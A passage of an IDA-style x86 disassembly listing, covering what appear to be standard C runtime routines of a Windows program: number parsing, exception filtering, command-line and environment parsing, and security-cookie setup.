div [ebp+arg_C]
loc_40A8EB: ; CODE XREF: sub_40A7C0+19D�j
movzx ecx, bl
movzx ecx, word ptr [esi+ecx*2]
test cl, 4
jz short loc_40A8FF
movsx ecx, bl
sub ecx, 30h
jmp short loc_40A919
; ---------------------------------------------------------------------------
loc_40A8FF: ; CODE XREF: sub_40A7C0+135�j
test cx, 103h
jz short loc_40A937
mov cl, bl
sub cl, 61h
cmp cl, 19h
movsx ecx, bl
ja short loc_40A916
sub ecx, 20h
loc_40A916: ; CODE XREF: sub_40A7C0+151�j
add ecx, 0FFFFFFC9h
loc_40A919: ; CODE XREF: sub_40A7C0+13D�j
cmp ecx, [ebp+arg_C]
jnb short loc_40A937
or [ebp+arg_10], 8
cmp [ebp+var_4], eax
jb short loc_40A94E
jnz short loc_40A92D
cmp ecx, edx
jbe short loc_40A94E
loc_40A92D: ; CODE XREF: sub_40A7C0+167�j
or [ebp+arg_10], 4
cmp [ebp+arg_8], 0
jnz short loc_40A95A
loc_40A937: ; CODE XREF: sub_40A7C0+144�j
; sub_40A7C0+15C�j
mov eax, [ebp+arg_10]
dec edi
test al, 8
jnz short loc_40A95F
cmp [ebp+arg_8], 0
jz short loc_40A948
mov edi, [ebp+arg_4]
loc_40A948: ; CODE XREF: sub_40A7C0+183�j
and [ebp+var_4], 0
jmp short loc_40A9AA
; ---------------------------------------------------------------------------
loc_40A94E: ; CODE XREF: sub_40A7C0+165�j
; sub_40A7C0+16B�j
mov ebx, [ebp+var_4]
imul ebx, [ebp+arg_C]
add ebx, ecx
mov [ebp+var_4], ebx
loc_40A95A: ; CODE XREF: sub_40A7C0+175�j
mov bl, [edi]
inc edi
jmp short loc_40A8EB
; ---------------------------------------------------------------------------
loc_40A95F: ; CODE XREF: sub_40A7C0+17D�j
test al, 4
mov esi, 7FFFFFFFh
jnz short loc_40A983
test al, 1
jnz short loc_40A9AA
and eax, 2
jz short loc_40A97A
cmp [ebp+var_4], 80000000h
ja short loc_40A983
loc_40A97A: ; CODE XREF: sub_40A7C0+1AF�j
test eax, eax
jnz short loc_40A9AA
cmp [ebp+var_4], esi
jbe short loc_40A9AA
loc_40A983: ; CODE XREF: sub_40A7C0+1A6�j
; sub_40A7C0+1B8�j
call sub_4057D3
test byte ptr [ebp+arg_10], 1
mov dword ptr [eax], 22h
jz short loc_40A99A
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_40A9AA
; ---------------------------------------------------------------------------
loc_40A99A: ; CODE XREF: sub_40A7C0+1D2�j
mov al, byte ptr [ebp+arg_10]
and al, 2
neg al
sbb eax, eax
neg eax
add eax, esi
mov [ebp+var_4], eax
loc_40A9AA: ; CODE XREF: sub_40A7C0+18C�j
; sub_40A7C0+1AA�j ...
mov eax, [ebp+arg_8]
test eax, eax
jz short loc_40A9B3
mov [eax], edi
loc_40A9B3: ; CODE XREF: sub_40A7C0+1EF�j
test byte ptr [ebp+arg_10], 2
jz short loc_40A9BC
neg [ebp+var_4]
loc_40A9BC: ; CODE XREF: sub_40A7C0+1F7�j
cmp [ebp+var_8], 0
jz short loc_40A9C9
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40A9C9: ; CODE XREF: sub_40A7C0+200�j
mov eax, [ebp+var_4]
jmp short loc_40A9E6
; ---------------------------------------------------------------------------
loc_40A9CE: ; CODE XREF: sub_40A7C0+BF�j
; sub_40A7C0+C8�j ...
mov eax, [ebp+arg_8]
test eax, eax
jz short loc_40A9D7
mov [eax], esi
loc_40A9D7: ; CODE XREF: sub_40A7C0+213�j
cmp [ebp+var_8], 0
jz short loc_40A9E4
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40A9E4: ; CODE XREF: sub_40A7C0+21B�j
xor eax, eax
loc_40A9E6: ; CODE XREF: sub_40A7C0+20C�j
pop ebx
loc_40A9E7: ; CODE XREF: sub_40A7C0+4C�j
pop edi
pop esi
leave
retn
sub_40A7C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A9EB proc near ; CODE XREF: sub_403EBD+8�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
xor eax, eax
cmp ds:dword_425DE0, eax
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
jnz short loc_40AA09
push offset off_423680
jmp short loc_40AA0A
; ---------------------------------------------------------------------------
loc_40AA09: ; CODE XREF: sub_40A9EB+15�j
push eax
loc_40AA0A: ; CODE XREF: sub_40A9EB+1C�j
call sub_40A7C0
add esp, 14h
pop ebp
retn
sub_40A9EB endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AA15 proc near ; CODE XREF: seg000:004040D1�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
call sub_40531A
mov esi, eax
test esi, esi
jnz short loc_40AA34
push [ebp+arg_4]
call ds:dword_41D198 ; UnhandledExceptionFilter
jmp loc_40AB81
; ---------------------------------------------------------------------------
loc_40AA34: ; CODE XREF: sub_40AA15+F�j
mov edx, [esi+5Ch]
mov eax, ds:dword_423E44
push edi
mov edi, [ebp+arg_0]
mov ecx, edx
push ebx
loc_40AA43: ; CODE XREF: sub_40AA15+3E�j
cmp [ecx], edi
jz short loc_40AA55
mov ebx, eax
imul ebx, 0Ch
add ecx, 0Ch
add ebx, edx
cmp ecx, ebx
jb short loc_40AA43
loc_40AA55: ; CODE XREF: sub_40AA15+30�j
imul eax, 0Ch
add eax, edx
cmp ecx, eax
jnb short loc_40AA66
cmp [ecx], edi
jnz short loc_40AA66
mov eax, ecx
jmp short loc_40AA68
; ---------------------------------------------------------------------------
loc_40AA66: ; CODE XREF: sub_40AA15+47�j
; sub_40AA15+4B�j
xor eax, eax
loc_40AA68: ; CODE XREF: sub_40AA15+4F�j
test eax, eax
jz short loc_40AA76
mov ebx, [eax+8]
test ebx, ebx
mov [ebp+var_4], ebx
jnz short loc_40AA84
loc_40AA76: ; CODE XREF: sub_40AA15+55�j
push [ebp+arg_4]
call ds:dword_41D198 ; UnhandledExceptionFilter
jmp loc_40AB7F
; ---------------------------------------------------------------------------
loc_40AA84: ; CODE XREF: sub_40AA15+5F�j
cmp ebx, 5
jnz short loc_40AA95
and dword ptr [eax+8], 0
xor eax, eax
inc eax
jmp loc_40AB7F
; ---------------------------------------------------------------------------
loc_40AA95: ; CODE XREF: sub_40AA15+72�j
cmp ebx, 1
jz loc_40AB7C
mov ecx, [esi+60h]
mov [ebp+var_8], ecx
mov ecx, [ebp+arg_4]
mov [esi+60h], ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_40AB6E
mov ecx, ds:dword_423E38
mov edi, ds:dword_423E3C
mov edx, ecx
add edi, ecx
cmp edx, edi
jge short loc_40AAEE
imul ecx, 0Ch
loc_40AACD: ; CODE XREF: sub_40AA15+D4�j
mov edi, [esi+5Ch]
and dword ptr [ecx+edi+8], 0
mov edi, ds:dword_423E38
mov ebx, ds:dword_423E3C
inc edx
add ebx, edi
add ecx, 0Ch
cmp edx, ebx
jl short loc_40AACD
mov ebx, [ebp+var_4]
loc_40AAEE: ; CODE XREF: sub_40AA15+B3�j
mov eax, [eax]
cmp eax, 0C000008Eh
mov edi, [esi+64h]
jnz short loc_40AB03
mov dword ptr [esi+64h], 83h
jmp short loc_40AB61
; ---------------------------------------------------------------------------
loc_40AB03: ; CODE XREF: sub_40AA15+E3�j
cmp eax, 0C0000090h
jnz short loc_40AB13
mov dword ptr [esi+64h], 81h
jmp short loc_40AB61
; ---------------------------------------------------------------------------
loc_40AB13: ; CODE XREF: sub_40AA15+F3�j
cmp eax, 0C0000091h
jnz short loc_40AB23
mov dword ptr [esi+64h], 84h
jmp short loc_40AB61
; ---------------------------------------------------------------------------
loc_40AB23: ; CODE XREF: sub_40AA15+103�j
cmp eax, 0C0000093h
jnz short loc_40AB33
mov dword ptr [esi+64h], 85h
jmp short loc_40AB61
; ---------------------------------------------------------------------------
loc_40AB33: ; CODE XREF: sub_40AA15+113�j
cmp eax, 0C000008Dh
jnz short loc_40AB43
mov dword ptr [esi+64h], 82h
jmp short loc_40AB61
; ---------------------------------------------------------------------------
loc_40AB43: ; CODE XREF: sub_40AA15+123�j
cmp eax, 0C000008Fh
jnz short loc_40AB53
mov dword ptr [esi+64h], 86h
jmp short loc_40AB61
; ---------------------------------------------------------------------------
loc_40AB53: ; CODE XREF: sub_40AA15+133�j
cmp eax, 0C0000092h
jnz short loc_40AB61
mov dword ptr [esi+64h], 8Ah
loc_40AB61: ; CODE XREF: sub_40AA15+EC�j
; sub_40AA15+FC�j ...
push dword ptr [esi+64h]
push 8
call ebx
pop ecx
mov [esi+64h], edi
jmp short loc_40AB75
; ---------------------------------------------------------------------------
loc_40AB6E: ; CODE XREF: sub_40AA15+9B�j
and dword ptr [eax+8], 0
push ecx
call ebx
loc_40AB75: ; CODE XREF: sub_40AA15+157�j
mov eax, [ebp+var_8]
pop ecx
mov [esi+60h], eax
loc_40AB7C: ; CODE XREF: sub_40AA15+83�j
or eax, 0FFFFFFFFh
loc_40AB7F: ; CODE XREF: sub_40AA15+6A�j
; sub_40AA15+7B�j
pop ebx
pop edi
loc_40AB81: ; CODE XREF: sub_40AA15+1A�j
pop esi
leave
retn
sub_40AA15 endp
; =============== S U B R O U T I N E =======================================
sub_40AB84 proc near ; CODE XREF: seg000:loc_40408E�p
push esi
push edi
xor edi, edi
cmp ds:dword_434DD4, edi
jnz short loc_40AB95
call sub_404E03
loc_40AB95: ; CODE XREF: sub_40AB84+A�j
mov esi, ds:dword_434DF8
test esi, esi
jnz short loc_40ABA4
mov esi, offset word_41D482
loc_40ABA4: ; CODE XREF: sub_40AB84+19�j
; sub_40AB84+4B�j
mov al, [esi]
cmp al, 20h
ja short loc_40ABB2
test al, al
jz short loc_40ABDC
test edi, edi
jz short loc_40ABD6
loc_40ABB2: ; CODE XREF: sub_40AB84+24�j
cmp al, 22h
jnz short loc_40ABBF
xor ecx, ecx
test edi, edi
setz cl
mov edi, ecx
loc_40ABBF: ; CODE XREF: sub_40AB84+30�j
movzx eax, al
push eax
call sub_41019D
test eax, eax
pop ecx
jz short loc_40ABCE
inc esi
loc_40ABCE: ; CODE XREF: sub_40AB84+47�j
inc esi
jmp short loc_40ABA4
; ---------------------------------------------------------------------------
loc_40ABD1: ; CODE XREF: sub_40AB84+56�j
cmp al, 20h
ja short loc_40ABDC
inc esi
loc_40ABD6: ; CODE XREF: sub_40AB84+2C�j
mov al, [esi]
test al, al
jnz short loc_40ABD1
loc_40ABDC: ; CODE XREF: sub_40AB84+28�j
; sub_40AB84+4F�j
pop edi
mov eax, esi
pop esi
retn
sub_40AB84 endp
; =============== S U B R O U T I N E =======================================
sub_40ABE1 proc near ; CODE XREF: seg000:loc_40406B�p
push ebx
xor ebx, ebx
cmp ds:dword_434DD4, ebx
push esi
push edi
jnz short loc_40ABF3
call sub_404E03
loc_40ABF3: ; CODE XREF: sub_40ABE1+B�j
mov esi, ds:dword_425A94
xor edi, edi
cmp esi, ebx
jnz short loc_40AC17
loc_40ABFF: ; CODE XREF: sub_40ABE1+51�j
or eax, 0FFFFFFFFh
jmp loc_40ACA2
; ---------------------------------------------------------------------------
loc_40AC07: ; CODE XREF: sub_40ABE1+3A�j
cmp al, 3Dh
jz short loc_40AC0C
inc edi
loc_40AC0C: ; CODE XREF: sub_40ABE1+28�j
push esi
call sub_404130
pop ecx
lea esi, [esi+eax+1]
loc_40AC17: ; CODE XREF: sub_40ABE1+1C�j
mov al, [esi]
cmp al, bl
jnz short loc_40AC07
push 4
inc edi
push edi
call sub_40777A
mov edi, eax
cmp edi, ebx
pop ecx
pop ecx
mov ds:dword_425F98, edi
jz short loc_40ABFF
mov esi, ds:dword_425A94
push ebp
jmp short loc_40AC7D
; ---------------------------------------------------------------------------
loc_40AC3D: ; CODE XREF: sub_40ABE1+9E�j
push esi
call sub_404130
mov ebp, eax
inc ebp
cmp byte ptr [esi], 3Dh
pop ecx
jz short loc_40AC7B
push 1
push ebp
call sub_40777A
cmp eax, ebx
pop ecx
pop ecx
mov [edi], eax
jz short loc_40ACA6
push esi
push ebp
push eax
call sub_4076D5
add esp, 0Ch
test eax, eax
jz short loc_40AC78
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402E3D
add esp, 14h
loc_40AC78: ; CODE XREF: sub_40ABE1+88�j
add edi, 4
loc_40AC7B: ; CODE XREF: sub_40ABE1+69�j
add esi, ebp
loc_40AC7D: ; CODE XREF: sub_40ABE1+5A�j
cmp [esi], bl
jnz short loc_40AC3D
push ds:dword_425A94
call sub_403603
mov ds:dword_425A94, ebx
mov [edi], ebx
mov ds:dword_434DC8, 1
xor eax, eax
loc_40ACA0: ; CODE XREF: sub_40ABE1+D9�j
pop ecx
pop ebp
loc_40ACA2: ; CODE XREF: sub_40ABE1+21�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40ACA6: ; CODE XREF: sub_40ABE1+79�j
push ds:dword_425F98
call sub_403603
mov ds:dword_425F98, ebx
or eax, 0FFFFFFFFh
jmp short loc_40ACA0
sub_40ABE1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ACBC proc near ; CODE XREF: sub_40AE54+55�p
; sub_40AE54+96�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_8]
push ebx
xor eax, eax
cmp [ebp+arg_0], eax
push esi
mov [edi], eax
mov esi, edx
mov edx, [ebp+arg_4]
mov dword ptr [ecx], 1
jz short loc_40ACE2
mov ebx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ebx], edx
loc_40ACE2: ; CODE XREF: sub_40ACBC+1B�j
mov [ebp+var_4], eax
loc_40ACE5: ; CODE XREF: sub_40ACBC+7E�j
; sub_40ACBC+88�j
cmp byte ptr [esi], 22h
jnz short loc_40ACFA
xor eax, eax
cmp [ebp+var_4], eax
mov bl, 22h
setz al
inc esi
mov [ebp+var_4], eax
jmp short loc_40AD36
; ---------------------------------------------------------------------------
loc_40ACFA: ; CODE XREF: sub_40ACBC+2C�j
inc dword ptr [edi]
test edx, edx
jz short loc_40AD08
mov al, [esi]
mov [edx], al
inc edx
mov [ebp+arg_4], edx
loc_40AD08: ; CODE XREF: sub_40ACBC+42�j
mov bl, [esi]
movzx eax, bl
push eax
inc esi
call sub_41019D
test eax, eax
pop ecx
jz short loc_40AD2C
inc dword ptr [edi]
cmp [ebp+arg_4], 0
jz short loc_40AD2B
mov ecx, [ebp+arg_4]
mov al, [esi]
inc [ebp+arg_4]
mov [ecx], al
loc_40AD2B: ; CODE XREF: sub_40ACBC+63�j
inc esi
loc_40AD2C: ; CODE XREF: sub_40ACBC+5B�j
test bl, bl
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_8]
jz short loc_40AD68
loc_40AD36: ; CODE XREF: sub_40ACBC+3C�j
cmp [ebp+var_4], 0
jnz short loc_40ACE5
cmp bl, 20h
jz short loc_40AD46
cmp bl, 9
jnz short loc_40ACE5
loc_40AD46: ; CODE XREF: sub_40ACBC+83�j
test edx, edx
jz short loc_40AD4E
mov byte ptr [edx-1], 0
loc_40AD4E: ; CODE XREF: sub_40ACBC+8C�j
; sub_40ACBC+AD�j
and [ebp+var_4], 0
loc_40AD52: ; CODE XREF: sub_40ACBC+183�j
cmp byte ptr [esi], 0
jz loc_40AE44
loc_40AD5B: ; CODE XREF: sub_40ACBC+AA�j
mov al, [esi]
cmp al, 20h
jz short loc_40AD65
cmp al, 9
jnz short loc_40AD6B
loc_40AD65: ; CODE XREF: sub_40ACBC+A3�j
inc esi
jmp short loc_40AD5B
; ---------------------------------------------------------------------------
loc_40AD68: ; CODE XREF: sub_40ACBC+78�j
dec esi
jmp short loc_40AD4E
; ---------------------------------------------------------------------------
loc_40AD6B: ; CODE XREF: sub_40ACBC+A7�j
cmp byte ptr [esi], 0
jz loc_40AE44
cmp [ebp+arg_0], 0
jz short loc_40AD83
mov eax, [ebp+arg_0]
add [ebp+arg_0], 4
mov [eax], edx
loc_40AD83: ; CODE XREF: sub_40ACBC+BC�j
inc dword ptr [ecx]
loc_40AD85: ; CODE XREF: sub_40ACBC+16E�j
xor ebx, ebx
inc ebx
xor ecx, ecx
jmp short loc_40AD8E
; ---------------------------------------------------------------------------
loc_40AD8C: ; CODE XREF: sub_40ACBC+D5�j
inc esi
inc ecx
loc_40AD8E: ; CODE XREF: sub_40ACBC+CE�j
cmp byte ptr [esi], 5Ch
jz short loc_40AD8C
cmp byte ptr [esi], 22h
jnz short loc_40ADBE
test cl, 1
jnz short loc_40ADBC
cmp [ebp+var_4], 0
jz short loc_40ADAF
lea eax, [esi+1]
cmp byte ptr [eax], 22h
jnz short loc_40ADAF
mov esi, eax
jmp short loc_40ADBC
; ---------------------------------------------------------------------------
loc_40ADAF: ; CODE XREF: sub_40ACBC+E5�j
; sub_40ACBC+ED�j
xor eax, eax
xor ebx, ebx
cmp [ebp+var_4], eax
setz al
mov [ebp+var_4], eax
loc_40ADBC: ; CODE XREF: sub_40ACBC+DF�j
; sub_40ACBC+F1�j
shr ecx, 1
loc_40ADBE: ; CODE XREF: sub_40ACBC+DA�j
test ecx, ecx
jz short loc_40ADD4
loc_40ADC2: ; CODE XREF: sub_40ACBC+113�j
dec ecx
test edx, edx
jz short loc_40ADCB
mov byte ptr [edx], 5Ch
inc edx
loc_40ADCB: ; CODE XREF: sub_40ACBC+109�j
inc dword ptr [edi]
test ecx, ecx
jnz short loc_40ADC2
mov [ebp+arg_4], edx
loc_40ADD4: ; CODE XREF: sub_40ACBC+104�j
mov al, [esi]
test al, al
jz short loc_40AE2F
cmp [ebp+var_4], 0
jnz short loc_40ADE8
cmp al, 20h
jz short loc_40AE2F
cmp al, 9
jz short loc_40AE2F
loc_40ADE8: ; CODE XREF: sub_40ACBC+122�j
test ebx, ebx
jz short loc_40AE29
test edx, edx
movsx eax, al
push eax
jz short loc_40AE17
call sub_41019D
test eax, eax
pop ecx
jz short loc_40AE0B
mov al, [esi]
mov ecx, [ebp+arg_4]
inc [ebp+arg_4]
mov [ecx], al
inc esi
inc dword ptr [edi]
loc_40AE0B: ; CODE XREF: sub_40ACBC+140�j
mov ecx, [ebp+arg_4]
mov al, [esi]
inc [ebp+arg_4]
mov [ecx], al
jmp short loc_40AE24
; ---------------------------------------------------------------------------
loc_40AE17: ; CODE XREF: sub_40ACBC+136�j
call sub_41019D
test eax, eax
pop ecx
jz short loc_40AE24
inc esi
inc dword ptr [edi]
loc_40AE24: ; CODE XREF: sub_40ACBC+159�j
; sub_40ACBC+163�j
inc dword ptr [edi]
mov edx, [ebp+arg_4]
loc_40AE29: ; CODE XREF: sub_40ACBC+12E�j
inc esi
jmp loc_40AD85
; ---------------------------------------------------------------------------
loc_40AE2F: ; CODE XREF: sub_40ACBC+11C�j
; sub_40ACBC+126�j ...
test edx, edx
jz short loc_40AE3A
mov byte ptr [edx], 0
inc edx
mov [ebp+arg_4], edx
loc_40AE3A: ; CODE XREF: sub_40ACBC+175�j
inc dword ptr [edi]
mov ecx, [ebp+arg_8]
jmp loc_40AD52
; ---------------------------------------------------------------------------
loc_40AE44: ; CODE XREF: sub_40ACBC+99�j
; sub_40ACBC+B2�j
mov eax, [ebp+arg_0]
test eax, eax
pop esi
pop ebx
jz short loc_40AE50
and dword ptr [eax], 0
loc_40AE50: ; CODE XREF: sub_40ACBC+18F�j
inc dword ptr [ecx]
leave
retn
sub_40ACBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AE54 proc near ; CODE XREF: seg000:0040405A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
xor ebx, ebx
cmp ds:dword_434DD4, ebx
push esi
push edi
jnz short loc_40AE6C
call sub_404E03
loc_40AE6C: ; CODE XREF: sub_40AE54+11�j
push 104h
mov esi, offset dword_4262F8
push esi
push ebx
mov ds:byte_4263FC, bl
call ds:dword_41D060
mov eax, ds:dword_434DF8
cmp eax, ebx
mov ds:dword_425FA8, esi
jz short loc_40AE9A
cmp [eax], bl
mov [ebp+var_4], eax
jnz short loc_40AE9D
loc_40AE9A: ; CODE XREF: sub_40AE54+3D�j
mov [ebp+var_4], esi
loc_40AE9D: ; CODE XREF: sub_40AE54+44�j
mov edx, [ebp+var_4]
lea eax, [ebp+var_8]
push eax
push ebx
push ebx
lea edi, [ebp+var_C]
call sub_40ACBC
mov eax, [ebp+var_8]
add esp, 0Ch
cmp eax, 3FFFFFFFh
jnb short loc_40AF05
mov ecx, [ebp+var_C]
cmp ecx, 0FFFFFFFFh
jnb short loc_40AF05
mov edi, eax
shl edi, 2
lea eax, [edi+ecx]
cmp eax, ecx
jb short loc_40AF05
push eax
call sub_40773A
mov esi, eax
cmp esi, ebx
pop ecx
jz short loc_40AF05
mov edx, [ebp+var_4]
lea eax, [ebp+var_8]
push eax
add edi, esi
push edi
push esi
lea edi, [ebp+var_C]
call sub_40ACBC
mov eax, [ebp+var_8]
add esp, 0Ch
dec eax
mov ds:dword_425F8C, eax
mov ds:dword_425F90, esi
xor eax, eax
jmp short loc_40AF08
; ---------------------------------------------------------------------------
loc_40AF05: ; CODE XREF: sub_40AE54+65�j
; sub_40AE54+6D�j ...
or eax, 0FFFFFFFFh
loc_40AF08: ; CODE XREF: sub_40AE54+AF�j
pop edi
pop esi
pop ebx
leave
retn
sub_40AE54 endp
; =============== S U B R O U T I N E =======================================
sub_40AF0D proc near ; CODE XREF: seg000:00404050�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, ds:dword_426400
push ebx
push ebp
push esi
push edi
mov edi, ds:dword_41D134
xor ebx, ebx
xor esi, esi
cmp eax, ebx
push 2
pop ebp
jnz short loc_40AF56
call edi
mov esi, eax
cmp esi, ebx
jz short loc_40AF3D
mov ds:dword_426400, 1
jmp short loc_40AF5F
; ---------------------------------------------------------------------------
loc_40AF3D: ; CODE XREF: sub_40AF0D+22�j
call ds:dword_41D0F0
cmp eax, 78h
jnz short loc_40AF51
mov eax, ebp
mov ds:dword_426400, eax
jmp short loc_40AF56
; ---------------------------------------------------------------------------
loc_40AF51: ; CODE XREF: sub_40AF0D+39�j
mov eax, ds:dword_426400
loc_40AF56: ; CODE XREF: sub_40AF0D+1A�j
; sub_40AF0D+42�j
cmp eax, 1
jnz loc_40AFE3
loc_40AF5F: ; CODE XREF: sub_40AF0D+2E�j
cmp esi, ebx
jnz short loc_40AF72
call edi
mov esi, eax
cmp esi, ebx
jnz short loc_40AF72
loc_40AF6B: ; CODE XREF: sub_40AF0D+DC�j
; sub_40AF0D+E8�j ...
xor eax, eax
jmp loc_40B03B
; ---------------------------------------------------------------------------
loc_40AF72: ; CODE XREF: sub_40AF0D+54�j
; sub_40AF0D+5C�j
cmp [esi], bx
mov eax, esi
jz short loc_40AF87
loc_40AF79: ; CODE XREF: sub_40AF0D+71�j
; sub_40AF0D+78�j
add eax, ebp
cmp [eax], bx
jnz short loc_40AF79
add eax, ebp
cmp [eax], bx
jnz short loc_40AF79
loc_40AF87: ; CODE XREF: sub_40AF0D+6A�j
mov edi, ds:dword_41D138
push ebx
push ebx
push ebx
sub eax, esi
push ebx
sar eax, 1
inc eax
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi
mov ebp, eax
cmp ebp, ebx
jz short loc_40AFD8
push ebp
call sub_40773A
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_40AFD8
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi
test eax, eax
jnz short loc_40AFD4
push [esp+18h+var_8]
call sub_403603
pop ecx
mov [esp+18h+var_8], ebx
loc_40AFD4: ; CODE XREF: sub_40AF0D+B7�j
mov ebx, [esp+18h+var_8]
loc_40AFD8: ; CODE XREF: sub_40AF0D+97�j
; sub_40AF0D+A6�j
push esi
call ds:dword_41D13C
mov eax, ebx
jmp short loc_40B03B
; ---------------------------------------------------------------------------
loc_40AFE3: ; CODE XREF: sub_40AF0D+4C�j
cmp eax, ebp
jz short loc_40AFEB
cmp eax, ebx
jnz short loc_40AF6B
loc_40AFEB: ; CODE XREF: sub_40AF0D+D8�j
call ds:dword_41D140
mov esi, eax
cmp esi, ebx
jz loc_40AF6B
cmp [esi], bl
jz short loc_40B009
loc_40AFFF: ; CODE XREF: sub_40AF0D+F5�j
; sub_40AF0D+FA�j
inc eax
cmp [eax], bl
jnz short loc_40AFFF
inc eax
cmp [eax], bl
jnz short loc_40AFFF
loc_40B009: ; CODE XREF: sub_40AF0D+F0�j
sub eax, esi
inc eax
mov ebp, eax
push ebp
call sub_40773A
mov edi, eax
cmp edi, ebx
pop ecx
jnz short loc_40B027
push esi
call ds:dword_41D144
jmp loc_40AF6B
; ---------------------------------------------------------------------------
loc_40B027: ; CODE XREF: sub_40AF0D+10C�j
push ebp
push esi
push edi
call sub_407BF0
add esp, 0Ch
push esi
call ds:dword_41D144
mov eax, edi
loc_40B03B: ; CODE XREF: sub_40AF0D+60�j
; sub_40AF0D+D4�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_40AF0D endp
; =============== S U B R O U T I N E =======================================
sub_40B042 proc near ; CODE XREF: seg000:loc_40402C�p
push esi
push edi
mov eax, offset dword_421294
mov edi, offset dword_421294
cmp eax, edi
mov esi, eax
jnb short loc_40B063
loc_40B054: ; CODE XREF: sub_40B042+1F�j
mov eax, [esi]
test eax, eax
jz short loc_40B05C
call eax
loc_40B05C: ; CODE XREF: sub_40B042+16�j
add esi, 4
cmp esi, edi
jb short loc_40B054
loc_40B063: ; CODE XREF: sub_40B042+10�j
pop edi
pop esi
retn
sub_40B042 endp
; =============== S U B R O U T I N E =======================================
sub_40B066 proc near ; DATA XREF: sub_407979+3F�o
push esi
push edi
mov eax, offset dword_42129C
mov edi, offset dword_42129C
cmp eax, edi
mov esi, eax
jnb short loc_40B087
loc_40B078: ; CODE XREF: sub_40B066+1F�j
mov eax, [esi]
test eax, eax
jz short loc_40B080
call eax
loc_40B080: ; CODE XREF: sub_40B066+16�j
add esi, 4
cmp esi, edi
jb short loc_40B078
loc_40B087: ; CODE XREF: sub_40B066+10�j
pop edi
pop esi
retn
sub_40B066 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B08A proc near ; CODE XREF: seg000:00404118�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
mov eax, ds:dword_423064
and [ebp+var_8], 0
and [ebp+var_4], 0
push ebx
push edi
mov edi, 0BB40E64Eh
cmp eax, edi
mov ebx, 0FFFF0000h
jz short loc_40B0BA
test eax, ebx
jz short loc_40B0BA
not eax
mov ds:dword_423068, eax
jmp short loc_40B11A
; ---------------------------------------------------------------------------
loc_40B0BA: ; CODE XREF: sub_40B08A+21�j
; sub_40B08A+25�j
push esi
lea eax, [ebp+var_8]
push eax
call ds:dword_41D1A0
mov esi, [ebp+var_4]
xor esi, [ebp+var_8]
call ds:dword_41D194
xor esi, eax
call ds:dword_41D0E0
xor esi, eax
call ds:dword_41D108
xor esi, eax
lea eax, [ebp+var_10]
push eax
call ds:dword_41D058
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor esi, eax
cmp esi, edi
jnz short loc_40B100
mov esi, 0BB40E64Fh
jmp short loc_40B10B
; ---------------------------------------------------------------------------
loc_40B100: ; CODE XREF: sub_40B08A+6D�j
test esi, ebx
jnz short loc_40B10B
mov eax, esi
shl eax, 10h
or esi, eax
loc_40B10B: ; CODE XREF: sub_40B08A+74�j
; sub_40B08A+78�j
mov ds:dword_423064, esi
not esi
mov ds:dword_423068, esi
pop esi
loc_40B11A: ; CODE XREF: sub_40B08A+2E�j
pop edi
pop ebx
leave
retn
sub_40B08A endp
; =============== S U B R O U T I N E =======================================
sub_40B11E proc near ; DATA XREF: sub_40B18A�o
; seg002:00423060�o ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
mov eax, [edi]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_40B157
cmp dword ptr [eax+10h], 3
jnz short loc_40B157
mov eax, [eax+14h]
cmp eax, 19930520h
jz short loc_40B152
cmp eax, 19930521h
jz short loc_40B152
cmp eax, 19930522h
jz short loc_40B152
cmp eax, 1994000h
jnz short loc_40B157
loc_40B152: ; CODE XREF: sub_40B11E+1D�j
; sub_40B11E+24�j ...
call sub_40BE59
loc_40B157: ; CODE XREF: sub_40B11E+D�j
; sub_40B11E+13�j ...
cmp ds:byte_426408, 0
push esi
jz short loc_40B183
push ds:dword_426404
call sub_405193
mov esi, eax
test esi, esi
pop ecx
jz short loc_40B183
push esi
call sub_4101B0
test eax, eax
pop ecx
jz short loc_40B183
push edi
call esi
jmp short loc_40B185
; ---------------------------------------------------------------------------
loc_40B183: ; CODE XREF: sub_40B11E+41�j
; sub_40B11E+53�j ...
xor eax, eax
loc_40B185: ; CODE XREF: sub_40B11E+63�j
pop esi
pop edi
retn 4
sub_40B11E endp
; =============== S U B R O U T I N E =======================================
sub_40B18A proc near ; DATA XREF: seg001:0041D2D4�o
push offset sub_40B11E
call ds:dword_41D19C
push eax
call sub_405127
